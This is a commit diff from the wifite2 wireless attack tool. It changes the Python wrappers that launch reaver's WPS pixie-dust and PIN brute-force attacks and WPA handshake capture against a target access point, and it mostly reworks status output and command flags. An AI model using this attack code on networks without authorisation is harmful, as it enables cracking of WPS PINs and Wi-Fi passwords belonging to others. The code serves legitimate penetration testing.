alexandre/wifite2
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Output target info during WPS attacks.

Browse Source 
Also using reaver's --no-nacks option
This commit is contained in:
derv82
2017-05-14 15:27:19 -04:00
parent 2726381017
commit 890915b9b3
2 changed files with 238 additions and 212 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
py/AttackWPA.py
View File

@@ -34,13 +34,10 @@ class AttackWPA(Attack):
# First, start Airodump process # First, start Airodump process
with Airodump(channel=self.target.channel, with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid, target_bssid=self.target.bssid,
skip_wash=True,
output_file_prefix='wpa') as airodump: output_file_prefix='wpa') as airodump:
Color.clear_line() Color.clear_line()
Color.pattack("WPA", self.target, "Handshake capture", "Waiting for target to appear...") Color.pattack("WPA", self.target, "Handshake capture", "Waiting for target to appear...")
#Color.p('\r{+} {C}WPA-handshake attack{W}: ')
#Color.p('{O}waiting{W} for target to appear...')
airodump_target = self.wait_for_target(airodump) airodump_target = self.wait_for_target(airodump)
# Get client station MAC addresses # Get client station MAC addresses

81
py/AttackWPS.py
View File

@@ -2,6 +2,7 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
from Attack import Attack from Attack import Attack
from Airodump import Airodump
from Color import Color from Color import Color
from Configuration import Configuration from Configuration import Configuration
from CrackResultWPS import CrackResultWPS from CrackResultWPS import CrackResultWPS
@@ -58,26 +59,37 @@ class AttackWPS(Attack):
command = [ command = [
'reaver', 'reaver',
'-i', Configuration.interface, '--interface', Configuration.interface,
'-b', self.target.bssid, '--bssid', self.target.bssid,
'-c', self.target.channel, '--channel', self.target.channel,
'-K', '1', # pixie-dust attack '--pixie-dust', '1', # pixie-dust attack
'--delay', '0',
'--no-nacks',
'--session', '/dev/null', # Don't restart session '--session', '/dev/null', # Don't restart session
'-vv' # (very) verbose '-vv' # (very) verbose
] ]
stdout_write = open(self.stdout_file, 'a') stdout_write = open(self.stdout_file, 'a')
reaver = Process(command, stdout=stdout_write, stderr=Process.devnull()) reaver = Process(command, stdout=stdout_write, stderr=Process.devnull())
pin = None pin = None
step = '0) initializing' step = '0) initializing'
time_since_last_step = 0 time_since_last_step = 0
while True: with Airodump(channel=self.target.channel,
time.sleep(1) target_bssid=self.target.bssid,
skip_wash=False,
output_file_prefix='pixie') as airodump:
Color.clear_line() Color.clear_line()
Color.p('\r{+} {C}WPS pixie-dust attack{W} ') Color.pattack("WPS", self.target, "Pixie Dust", "Waiting for target to appear...")
while True:
try:
airodump_target = self.wait_for_target(airodump)
except Exception as e:
Color.pattack("WPS", self.target, "Pixie-Dust", "{R}failed: {O}%s{W}" % e)
Color.pl("")
return False
stdout_write.flush() stdout_write.flush()
@@ -99,15 +111,21 @@ class AttackWPS(Attack):
if pin and psk and ssid: if pin and psk and ssid:
# We cracked it. # We cracked it.
bssid = self.target.bssid bssid = self.target.bssid
Color.pl('\n\n{+} {G}successfully cracked WPS PIN and PSK{W}\n') Color.clear_line()
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}\n")
self.crack_result = CrackResultWPS(bssid, ssid, pin, psk) self.crack_result = CrackResultWPS(bssid, ssid, pin, psk)
self.crack_result.dump() self.crack_result.dump()
return True return True
else: else:
# Failed to crack, reaver proces ended. # Failed to crack, reaver proces ended.
Color.pl('{R}failed: {O}WPS pin not found{W}') Color.clear_line()
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{R}Failed: {O}WPS PIN not found{W}\n")
return False return False
if 'WPS pin not found' in stdout:
Color.pl('{R}failed: {O}WPS pin not found{W}')
break
last_step = step last_step = step
# Status updates, depending on last line of stdout # Status updates, depending on last line of stdout
if 'Waiting for beacon from' in stdout_last_line: if 'Waiting for beacon from' in stdout_last_line:
@@ -132,10 +150,6 @@ class AttackWPS(Attack):
break break
step = '({C}step -/8{W}) waiting for AP rate limit' step = '({C}step -/8{W}) waiting for AP rate limit'
if 'WPS pin not found' in stdout:
Color.pl('{R}failed: {O}WPS pin not found{W}')
break
if step != last_step: if step != last_step:
# Step changed, reset step timer # Step changed, reset step timer
time_since_last_step = 0 time_since_last_step = 0
@@ -161,9 +175,10 @@ class AttackWPS(Attack):
Color.pl('{R}failed: {O}too many timeouts (%d){W}' % timeout_count) Color.pl('{R}failed: {O}too many timeouts (%d){W}' % timeout_count)
break break
# Display status of Pixie-Dust attack Color.clear_line()
Color.p('{W}%s{W}' % step) Color.pattack("WPS", airodump_target, "Pixie-Dust", step)
time.sleep(1)
continue continue
# Attack failed, already printed reason why # Attack failed, already printed reason why
@@ -182,9 +197,9 @@ class AttackWPS(Attack):
# Start reaver process # Start reaver process
command = [ command = [
'reaver', 'reaver',
'-i', Configuration.interface, '--interface', Configuration.interface,
'-b', self.target.bssid, '--bssid', self.target.bssid,
'-c', self.target.channel, '--channel', self.target.channel,
'--session', '/dev/null', # Don't restart session '--session', '/dev/null', # Don't restart session
'-vv' # verbose '-vv' # verbose
] ]
@@ -197,18 +212,32 @@ class AttackWPS(Attack):
failures = 0 failures = 0
state = 'initializing' state = 'initializing'
with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid,
skip_wash=False,
output_file_prefix='wps') as airodump:
Color.clear_line()
Color.pattack("WPS", self.target, "PIN Attack", "Waiting for target to appear...")
while True: while True:
try:
airodump_target = self.wait_for_target(airodump)
except Exception as e:
Color.pattack("WPS", self.target, "PIN Attack", "{R}failed: {O}%s{W}" % e)
Color.pl("")
return False
time.sleep(1) time.sleep(1)
percent = 100 * float(pin_current) / float(pin_total) percent = 100 * float(pin_current) / float(pin_total)
Color.clear_line() Color.clear_line()
Color.p('\r{+} {C}WPS PIN attack{W} (') status = '{G}%.2f%% done{W}, ' % percent
Color.p('{G}%.2f%% done{W}, ' % percent) status += '{G}%d{W}/{G}%d pins{W}, ' % (pin_current, pin_total)
Color.p('{G}%d{W}/{G}%d pins{W}, ' % (pin_current, pin_total)) status += '{R}%d/%d failures{W}) ' % (failures, Configuration.wps_fail_threshold)
Color.p('{R}%d/%d failures{W}) ' % (failures, \ Color.pattack("WPS", airodump_target, "PIN Attack", status)
Configuration.wps_fail_threshold))
if failures >= Configuration.wps_fail_threshold: if failures >= Configuration.wps_fail_threshold:
Color.pl('{R}failed: {O}too many failures{W}') Color.pattack("WPS", airodump_target, "PIN Attack", '{R}failed: {O}too many failures{W}')
Color.pl("")
break break
# Get output # Get output